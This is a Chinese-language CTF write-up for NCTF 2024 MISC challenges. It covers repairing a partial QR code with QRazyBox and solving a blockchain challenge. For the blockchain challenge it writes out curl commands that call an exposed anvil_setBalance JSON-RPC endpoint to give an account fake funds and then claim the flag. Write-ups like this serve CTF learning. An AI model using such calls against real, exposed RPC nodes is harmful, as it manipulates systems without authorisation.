NCTF 2024 - MISC -WriteUp

碎碎念

这个周末忙飞了）比赛全部都堆在一起了，而且本身还有别的安排，感觉要忙不过来了，所以赛后复现可能不会那么快出，先等官方的wp发了吧，nctf的题目还是比较难的~~（还是hmg简单啊）~~没有什么擅长的领域，mc题还搞错方向了（vol还是没玩明白），后续再补充一下知识才行

QRcode Reconstruction

知识点省流

二维码修复+对二维码的深入了解

WP

下载得到一张不完整的二维码

拿QRazyBox画一下

然后用QRazyBox的功能分析它的数据信息就能看到flag了（够用了，前面补上格式头）

因为本质上二维码的数据就藏在像素内，只要知道对应的部分就能得到想要的数据（曾经有一道半张二维码的题目，原理差不多）

x1guessgame

知识点省流

区块链+代码审计

WP

显然是区块链题，附件是给的网站和区块链的源码，可以让大模型帮忙分析一下源码，发现只要让账户余额超过10eth就可以获得flag

而似乎可以直接向/rpc端点发送JSON-RPC请求（直接访问/rpc是不行的，路由限制了访问形式），直接设置账户的余额，所以直接用cmd发送以下内容即可

curl -X POST http://39.106.16.204:17624/rpc -H "Content-Type: application/json" -d "{\"jsonrpc\": \"2.0\", \"method\": \"anvil_setBalance\", \"params\": [\"0x017Cd877b9ce1FD17d0a52Ead617f2afF98E05d3\", \"0x8ac7239489e80000\"], \"id\": 1}"

然后再调用服务器的/button-click端点获取flag即可（源码中都有的）

curl -X POST http://39.106.16.204:17624/button-click -H "Content-Type: application/json" -d "{\"button_id\": \"get flag\"}"